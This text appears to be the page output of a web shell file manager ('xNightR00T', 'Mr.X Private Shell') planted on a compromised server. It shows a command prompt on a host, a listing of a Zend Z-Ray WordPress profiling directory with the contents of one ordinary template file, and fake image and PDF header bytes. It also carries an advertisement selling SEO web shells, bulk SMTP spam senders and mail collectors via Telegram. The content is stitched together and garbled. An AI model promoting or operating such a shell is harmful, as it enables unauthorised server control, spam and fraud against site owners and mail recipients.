xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php 
$tableParams = array(
	'tableId' 			=> 'wp-theme-table',
    'tableWidth'        => '4',
);

echo $this->zrayTable($tableParams); //zrayTableHtml 
?>

<script type="text/javascript">
(function() {
	var storage = zray.getStorage('theme');

	// create main table
	var maintable = zray.createTable(storage, jQuery('#<?php echo $tableParams['tableId']; ?>'));
	var cols = [
		{
			"label": "Theme",
			"propertyName": "name",
			"sortable": true,
			"width": '20%'
		},
		{
			"label": "Duration Inclusive (ms)",
			"propertyName": "dInclusive",
			"sortable": true,
			"width": '20%'
		},
		{
			"label": "Duration Exclusive (ms)",
			"propertyName": "dExclusive",
			"sortable": true,
			"width": '20%'
		}
		
	];
	
	if(zray.getFileActions && zray.showInIde){
		cols.push({
			label: 'File Name',
			tooltip: 'File actions',
			propertyName: 'filename',
			sortable:true,
			getHtml: function(val, rec) {
				var showInIDEParams = {filePath: rec.filename, line: rec.line, fullUrl: document.location.href};
				return zray.getFileActions(rec.fileLine, val, rec.filename, showInIDEParams);
			}
		});
	}else{
		cols.push({
			"label": "File Name",
			"propertyName": "fileLine",
			"sortable": true,
			"width": '20%'
		});
	}
	
	maintable.setColumns(cols);
	// create main table - end
	var template = {};
	zray.registerDataHandler('WordPress', 'generalInfo', function(generalInfoData, requestData) {
		zendDevBar.showData('functions');
		jQuery.each(generalInfoData,function(k,v){
			if (typeof v.name == "undefined") {
				return;
			}
			switch(v.name.toLowerCase()){
				case 'template':
					template.name = v.value;
					break;
				case 'template directory':
					template.dir = v.value;
					break;
			}
		});
		loadProfilingData(template);
		
	});
	
	var loadingProfilingData = false;
	var loadProfilingData = function(template){
		if(loadingProfilingData) { return; }
		var functionsData = zendDevBar.getStorage('functions').getData();
		if(functionsData.length == 0){
		return setTimeout(function(){ 
				loadProfilingData(template);
			},100);
		}
		loadingProfilingData = true;
		
		var funcs = [];
		
		jQuery.each(functionsData,function(fIndex,functionData){
			var filename = functionData.filename.replace(/\\/g,'/');
			if(filename.indexOf(template.dir) == 0){
				var item = {
					filename: functionData.filename,
					line: functionData.line,
					name: functionData.functionFull,
					dInclusive: functionData.timeInclusive / 1000,
					dExclusive: functionData.timeExclusive / 1000,
					fileLine: template.name + filename.replace(template.dir,'')+':'+functionData.line
				};
				funcs.push(item);
			}
		});
		storage.setData(funcs);
		jQuery('[data-name="zrayExtension:wordpress/plugins"] .zdb-toolbar-info').append(' ('+funcs.length+')');
	}
	
	
})();
</script>

Filemanager

Name Type Size Permission Actions
cacheObjects.css File 1.36 KB 0644
cacheObjects.phtml File 3.85 KB 0644
crons.phtml File 1.02 KB 0644
dashboard.phtml File 4.52 KB 0644
hooks.phtml File 6.21 KB 0644
plugins.phtml File 6.25 KB 0644
style.css File 2.36 KB 0644
theme.phtml File 2.83 KB 0644
wp_query.phtml File 1.4 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1